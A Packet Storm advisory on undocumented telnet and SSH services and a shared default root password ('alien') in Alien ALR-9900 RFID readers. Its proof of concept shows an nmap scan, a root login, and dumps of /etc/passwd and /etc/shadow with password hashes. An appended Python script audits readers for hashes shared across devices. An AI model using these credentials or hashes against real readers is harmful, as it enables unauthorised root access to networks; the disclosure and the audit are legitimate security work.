
Alien Technology ALR-9900 Default Passwords

06 May 2010 | Reported by Packet Storm | Type: packetstorm | Source: packetstormsecurity.com

Alien Technology ALR-9900 Default Passwords and Undocumented Service

Code
`
  
Tested:  
www.alientechnology.com/readers/alr9900.php  
  
Background:  
Alien Technology is a major RFID reader designer and manufacturer.  
Alien's products are sold to many corporations and the military.  
Alien's readers can be interfaced with in several ways including:  
serial, IO Port and Ethernet port. Alien has several daemons  
running on their reader that are accessible through Ethernet and  
completely undocumented. We called Alien several times to ask them  
about these undocumented services and were first deferred to  
technical support and then had our numbers blocked. We then  
emailed them about the security ramifications of these daemons and  
received no reply.  
  
The Undocumented:  
port 2323 - telnetd  
port 23 - telnetd  
port 22 - sshd  
  
The Flaws:  
default root password = 'alien'  
alien account has same password across all readers  
port 2323 - provides a backdoor onto the readers for anyone who  
knows the alien (or root) account password  
port 23 - ""  
port 22 - ""  
  
The P.O.C:  
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific Daylight Time  
  
Nmap scan report for XXX.XXX.XXX.XXX  
Host is up (0.000092s latency).  
Not shown: 995 closed ports  
  
PORT STATE SERVICE  
22/tcp open ssh  
23/tcp open telnet  
80/tcp open http  
111/tcp open rpcbind  
2323/tcp open unknown  
  
MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)  
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds  
  
  
login as: root  
Using keyboard-interactive authentication.  
Password: <- root  
Access denied  
Using keyboard-interactive authentication.  
Password: <- password  
Access denied  
Using keyboard-interactive authentication.  
Password: <- alien  
  
Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX  
root@alien-XXXXXX alien# id  
uid=0(root) gid=0(root) groups=0(root)  
  
root@alien-XXXXXX alien# cat /etc/passwd  
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash  
daemon:*:1:1:daemon:/usr/sbin:/bin/sh  
bin:*:2:2:bin:/bin:/bin/sh  
sys:*:3:3:sys:/dev:/bin/sh  
sync:*:4:65534:sync:/bin:/bin/sync  
man:*:6:12:man:/var/cache/man:/bin/sh  
lp:*:7:7:lp:/var/spool/lpd:/bin/sh  
mail:*:8:8:mail:/var/mail:/bin/sh  
news:*:9:9:news:/var/spool/news:/bin/sh  
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:*:13:13:proxy:/bin:/bin/sh  
www-data:*:33:33:www-data:/var/www:/bin/sh  
backup:*:34:34:backup:/var/backups:/bin/sh  
list:*:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:*:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh  
sshd:x:100:65534::/var/run/sshd:/bin/false  
ntpd:x:102:102::/var/run/openntpd:/bin/false  
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,,:/home/alien:/bin/bash  
  
root@alien-XXXXXX alien# cat /etc/shadow  
ntpd:!:13602:0:99999:7:::  
sshd:!:13602:0:99999:7:::  
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::  
  
Impact:  
Alien's readers are deployed in many secure facilities with  
typically closed networks. Although these networks are closed,  
these undocumented services could allow employees to modify reader  
settings and subvert checkout systems. These checkout systems are  
often used to track valuable items making such vulnerabilities a  
serious matter. If these readers are deployed on an open or large  
network they provide an easy way to tunnel into the network or  
attack it from an unexpected location. Lastly, if someone cracks  
the alien account's password hash they get to use Alien's backdoor.  
  
  
`
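
A fleet audit for the credential flaws listed above, as an added example that is not part of the original advisory: it parses `/etc/passwd` dumps collected from several readers, flags password hashes kept in `passwd` (conventionally world-readable) and md5-crypt (`$1$`) hashes, and reports any salted hash that is byte-identical on more than one device, which indicates a factory-set password that was never changed. Device names, the scenario (root rotated on one reader, `alien` untouched) and all hash strings are constructed placeholders.

```python
from collections import defaultdict

# Constructed sample input: trimmed /etc/passwd dumps from two readers.
# Hash strings are placeholders in md5-crypt layout, not real hashes.
ALIEN_HASH = "$1$EXAMPLE2$BBBBBBBBBBBBBBBBBBBBBB"
PASSWD_BY_DEVICE = {
    "reader-a": (
        "root:$1$EXAMPLE1$AAAAAAAAAAAAAAAAAAAAAA:0:0:root:/root:/bin/bash\n"
        "daemon:*:1:1:daemon:/usr/sbin:/bin/sh\n"
        "sshd:x:100:65534::/var/run/sshd:/bin/false\n"
        f"alien:{ALIEN_HASH}:1000:1000:The Alien:/home/alien:/bin/bash\n"
    ),
    "reader-b": (
        "root:$1$EXAMPLE3$CCCCCCCCCCCCCCCCCCCCCC:0:0:root:/root:/bin/bash\n"
        f"alien:{ALIEN_HASH}:1000:1000:The Alien:/home/alien:/bin/bash\n"
    ),
}

def parse_passwd(text):
    """Yield (user, password_field) for each well-formed 7-field line."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) == 7:
            yield parts[0], parts[1]

def has_hash(pw_field):
    # "*", "!" and "x" are lock/shadow markers, not password hashes.
    return pw_field.startswith("$")

def audit_device(text):
    """Return (user, finding) pairs for one device's passwd dump."""
    findings = []
    for user, pw in parse_passwd(text):
        if has_hash(pw):
            findings.append((user, "hash-in-passwd"))
            if pw.startswith("$1$"):
                findings.append((user, "md5-crypt"))
    return findings

def shared_hashes(passwd_by_device):
    """Map (user, hash) -> devices, for hashes seen on more than one device."""
    seen = defaultdict(list)
    for device in sorted(passwd_by_device):
        for user, pw in parse_passwd(passwd_by_device[device]):
            if has_hash(pw):
                seen[(user, pw)].append(device)
    return {key: devs for key, devs in seen.items() if len(devs) > 1}

if __name__ == "__main__":
    for (user, _), devices in shared_hashes(PASSWD_BY_DEVICE).items():
        print(f"{user}: identical salted hash on {', '.join(devices)}")
```

Because the salt is part of the stored string, two devices whose users picked the same password independently would still show different hash fields; an exact match points to a credential baked into the image.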
